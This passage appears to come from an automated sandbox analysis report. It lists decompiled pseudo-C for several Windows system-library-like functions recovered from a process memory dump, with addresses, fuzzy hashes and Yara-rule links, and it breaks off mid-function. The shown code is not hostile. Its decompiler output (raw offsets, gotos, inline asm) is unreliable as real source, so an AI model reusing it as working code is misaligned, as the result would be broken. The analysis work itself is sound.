				void* _t119;

				_push(0x80);
				_push(0x50a05f0);
				E0501D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04FDEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E050453CA(0);
						return E0501D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0500F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04FE3690(1, _t117, 0x4fa1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0500AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04FE4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0500AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0504500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E05009860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x050451be
0x050451c3
0x050451c8
0x050451cd
0x050451d0
0x050451d3
0x050451d8
0x050451db
0x050451de
0x050451e0
0x050451e3
0x050451e6
0x050451e8
0x05045342
0x05045351
0x05045356
0x0504535a
0x05045360
0x05045363
0x05045366
0x05045369
0x05045369
0x0504536b
0x0504536b
0x05045370
0x050453a3
0x050453a4
0x050453a6
0x050453ab
0x050453ab
0x050453ae
0x050453ae
0x050453b5
0x050453bf
0x050453bf
0x05045375
0x05045396
0x050453a0
0x050453a0
0x00000000
0x05045396
0x05045377
0x05045379
0x0504537f
0x0504538c
0x05045390
0x00000000
0x05045390
0x050451ee
0x050451f1
0x05045301
0x05045310
0x05045315
0x05045318
0x0504531b
0x05045320
0x0504532e
0x05045331
0x00000000
0x05045331
0x05045328
0x05045329
0x00000000
0x05045329
0x050451fa
0x05045235
0x05045236
0x05045239
0x0504523f
0x05045240
0x05045241
0x05045242
0x05045246
0x05045247
0x0504524e
0x05045251
0x05045267
0x05045269
0x0504526e
0x0504527d
0x0504527e
0x05045281
0x05045282
0x05045287
0x05045288
0x0504528a
0x0504528f
0x05045294
0x00000000
0x00000000
0x0504529a
0x0504529c
0x0504529e
0x0504529e
0x050452a4
0x050452b0
0x00000000
0x00000000
0x050452ba
0x050452bc
0x050452bc
0x050452d4
0x050452d9
0x050452dc
0x050452e1
0x00000000
0x00000000
0x050452e7
0x050452f4
0x00000000
0x050452f4
0x05045270
0x00000000
0x05045270
0x050451fc
0x050451fd
0x05045202
0x05045203
0x05045205
0x0504520a
0x0504520f
0x00000000
0x00000000
0x0504521b
0x05045226
0x0504522b
0x0504521d
0x0504521d
0x05045222
0x05045222
0x0504522d
0x00000000

Strings

Legacy, xrefs: 05045226
UEFI, xrefs: 0504521D

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c6a78809156ee25f1355460386ceaa2c38fd1ac737ba1f6089cc1acb4b9b46fb
Instruction ID: 3495e65241214f55f1b510f64a44c0b497a6d5cbc32c38e97d82506a80f3075d
Opcode Fuzzy Hash: c6a78809156ee25f1355460386ceaa2c38fd1ac737ba1f6089cc1acb4b9b46fb
Instruction Fuzzy Hash: F8517DB1A04608AFDB25DFA8ED40BAEBBF9FF48700F14406DE549EB291D671A901CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04FCB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04FCB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x509f7a8);
				E0501D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0501D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0500D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0500F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0501DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0500B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0500B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0500E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0500A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x04fcb171
0x04fcb171
0x04fcb171
0x04fcb171
0x04fcb171
0x04fcb176
0x04fcb17b
0x04fcb180
0x04fcb186
0x04fcb18f
0x04fcb198
0x04fcb1a4
0x04fcb1aa
0x05024802
0x05024802
0x05024805
0x0502480c
0x0502480e
0x04fcb1d1
0x04fcb1d3
0x04fcb1de
0x04fcb1de
0x05024817
0x0502481e
0x05024820
0x05024822
0x05024822
0x05024824
0x05024824
0x0502482a
0x00000000
0x00000000
0x05024835
0x0502483a
0x0502483d
0x0502483f
0x05024842
0x05024842
0x05024842
0x05024846
0x0502484c
0x0502484e
0x05024851
0x05024851
0x05024853
0x05024854
0x05024854
0x05024858
0x0502485a
0x0502485a
0x0502485d
0x0502485f
0x05024861
0x05024861
0x05024866
0x0502486b
0x0502486e
0x05024871
0x05024876
0x05024876
0x05024878
0x0502487b
0x05024884
0x05024884
0x00000000
0x0502487d
0x0502487d
0x05024882
0x05024889
0x05024889
0x0502488f
0x05024891
0x050248e0
0x050248e2
0x050248e4
0x050248e4
0x050248e7
0x050248e7
0x050248ed
0x050248f4
0x050248f6
0x05024951
0x05024951
0x05024953
0x05024953
0x05024956
0x05024956
0x05024958
0x05024959
0x05024959
0x0502495d
0x0502495d
0x0502495f
0x0502495f
0x05024965
0x05024969
0x050249ba
0x050249ba
0x050249c1
0x050249c5
0x050249cc
0x050249d4
0x050249d7
0x050249da
0x050249e4
0x050249e5
0x050249f3
0x05024a02
0x00000000
0x05024a02
0x05024972
0x05024974
0x00000000
0x00000000
0x05024976
0x05024979
0x05024982
0x05024983
0x05024984
0x0502498b
0x0502498d
0x05024991
0x05024993
0x05024999
0x0502499d
0x050249a2
0x050249a2
0x050249a2
0x05024999
0x050249ac
0x00000000
0x050249b3
0x050248f8
0x050248fe
0x00000000
0x00000000
0x00000000
0x050248fe
0x05024895
0x0502489c
0x050248ad
0x050248b2
0x050248b5
0x050248b7
0x050248ba
0x050248bc
0x050248c6
0x050248c6
0x050248cb
0x050248d1
0x050248d4
0x050248d8
0x050248d8
0x00000000
0x050248d8
0x050248be
0x050248c0
0x00000000
0x00000000
0x050248c2
0x00000000
0x00000000
0x00000000
0x050248c4
0x00000000
0x05024882
0x0502487b
0x05024904
0x05024906
0x00000000
0x00000000
0x05024908
0x0502490e
0x00000000
0x00000000
0x05024910
0x05024917
0x05024917
0x00000000
0x05024917
0x04fcb1ba
0x050247f9
0x050247fc
0x00000000
0x00000000
0x00000000
0x050247fc
0x04fcb1c0
0x04fcb1c0
0x04fcb1c3
0x04fcb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 050248AD

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 2875e109a38bb34e159484679804fbfd285e2ee844ee0c73ff0a74fa74177a39
Instruction ID: 2c8b79cd4c8a74064b26a07bed01f1c831111110f3eb6a51c4837e1dab35a064
Opcode Fuzzy Hash: 2875e109a38bb34e159484679804fbfd285e2ee844ee0c73ff0a74fa74177a39
Instruction Fuzzy Hash: BA51FD71E102698EEF36CF78E845BBEBBF1BF00710F2041ADE859AB681D77149458B91

Uniqueness

Uniqueness Score: -1.00%

Function 04FEB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04FEB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x50bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04FE7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05098CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E05009E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0500B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0500CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04FE7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05098F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0500AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x50b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x50b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x50b8628; // 0x0
							_t116 =  *0x50b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x04feb94c
0x04feb956
0x04feb95c
0x04feb95e
0x04feb964
0x04feb969
0x04feb96d
0x04feb96d
0x04feb970
0x04feb974
0x04feb97a
0x04febadf
0x04febadf
0x04febae2
0x04febae4
0x04febae6
0x04febaf0
0x05032cb8
0x04febaf6
0x04febaf6
0x04febaf6
0x04febafd
0x04febb1f
0x04febb1f
0x04febaff
0x04febb00
0x04febb00
0x04febb03
0x04febb03
0x04febacb
0x04febacf
0x04febad0
0x04febad1
0x04febadc
0x04febadc
0x04feb980
0x04feb980
0x04feb988
0x04feb98b
0x04feb98d
0x04feb990
0x04feb993
0x04feb999
0x04feb99b
0x04feb9a1
0x04feb9a5
0x04feb9aa
0x04feb9b0
0x04feb9bb
0x04feb9c0
0x04feb9c3
0x04feb9ca
0x04feb9cc
0x04feb9cf
0x04feb9d3
0x04feb9d7
0x04feba94
0x04feba94
0x04feba98
0x04febaa3
0x05032ccb
0x04febaa9
0x04febaa9
0x04febaa9
0x04febab1
0x05032cd5
0x05032cdd
0x05032cdd
0x04febabb
0x04febabc
0x04febac2
0x04febac3
0x04febac3
0x04febac6
0x00000000
0x04feb9dd
0x04feb9dd
0x04feb9e7
0x04feb9e7
0x04feb9ec
0x04feb9ec
0x04feb9f1
0x04feb9f5
0x04feb9fa
0x04feba00
0x04feba0c
0x04feba10
0x04feba10
0x04feba12
0x04feba18
0x00000000
0x00000000
0x04febb26
0x04febb26
0x04feba1e
0x04feba1e
0x04feba23
0x04feba25
0x04feba2c
0x04feba30
0x04feba35
0x04feba35
0x04feba41
0x04feba46
0x04feba4c
0x04feba50
0x04feba54
0x04feba6a
0x04feba6e
0x04feba70
0x04feba74
0x04feba78
0x04feba7a
0x04feba7c
0x04feba8e
0x04feba90
0x04feba92
0x04febb14
0x04febb14
0x04febb16
0x04febb16
0x00000000
0x04feba7c
0x04febb0a
0x04febb0d
0x00000000
0x00000000
0x00000000
0x04febb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04FEB9A5

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: b0833fd93862801e05f9458ef71cfcaafb8742bc85b59c05e8ba050478b9f037
Instruction ID: 0fa533e4449d4cd9975f7da2db9918f7906aa48421c75a3513c3f1027b0de52e
Opcode Fuzzy Hash: b0833fd93862801e05f9458ef71cfcaafb8742bc85b59c05e8ba050478b9f037
Instruction Fuzzy Hash: E8514971A18341CFDB20DF2AD4C092ABBE9FB88605F14896EF98597355E730F845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04FF2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E04FF2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t251;
				signed int _t253;
				intOrPtr _t255;
				signed int _t258;
				signed int _t265;
				signed int _t268;
				signed int _t276;
				intOrPtr _t282;
				signed int _t284;
				signed int _t286;
				void* _t293;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				signed int _t303;
				signed int _t307;
				intOrPtr _t319;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				void* _t344;
				void* _t346;

				_t341 = _t343;
				_t344 = _t343 - 0x4c;
				_v8 =  *0x50bd360 ^ _t341;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t336 = 0x50bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t346 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t282 = 0x48;
				_t317 = 0 | _t346 == 0x00000000;
				_t328 = 0;
				_v37 = _t346 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t282 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t337 = 0xc0000106;
						goto L32;
					} else {
						_t336 = L04FE4620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
						_v52 = _t336;
						__eflags = _t336;
						if(_t336 == 0) {
							_t337 = 0xc0000017;
							goto L32;
						} else {
							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
							_t50 = _t336 + 0x48; // 0x48
							_t330 = _t50;
							_t317 = _v32;
							 *((intOrPtr*)(_t336 + 0x3c)) = _t282;
							_t284 = 0;
							 *((short*)(_t336 + 0x30)) = _v48;
							__eflags = _t317;
							if(_t317 != 0) {
								 *(_t336 + 0x18) = _t330;
								__eflags = _t317 - 0x50b8478;
								 *_t336 = ((0 | _t317 == 0x050b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0500F3E0(_t330,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
								_t317 = _v32;
								_t344 = _t344 + 0xc;
								_t284 = 1;
								__eflags = _a8;
								_t330 = _t330 + (( *_t317 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t276 = E050539F2(_t330);
									_t317 = _v32;
									_t330 = _t276;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t337 = _v68;
								__eflags = 0;
								 *((short*)(_t330 - 2)) = 0;
								goto L32;
							} else {
								_t286 = _t336 + _t284 * 4;
								_v56 = _t286;
								do {
									__eflags = _t317;
									if(_t317 != 0) {
										_t233 =  *(_v60 + _t301 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t286 =  *(_v60 + _t301 * 4);
										 *(_t286 + 0x18) = _t330;
										_t237 =  *(_v60 + _t301 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M04FF2959))) {
												case 0:
													__ax =  *0x50b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0500F3E0(__edi,  *0x50b848c, __ax & 0x0000ffff);
														__eax =  *0x50b8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0500F3E0(_t330, _v80, _v64);
													_t271 = _v64;
													goto L26;
												case 2:
													 *0x50b8480 & 0x0000ffff = E0500F3E0(__edi,  *0x50b8484,  *0x50b8480 & 0x0000ffff);
													__eax =  *0x50b8480 & 0x0000ffff;
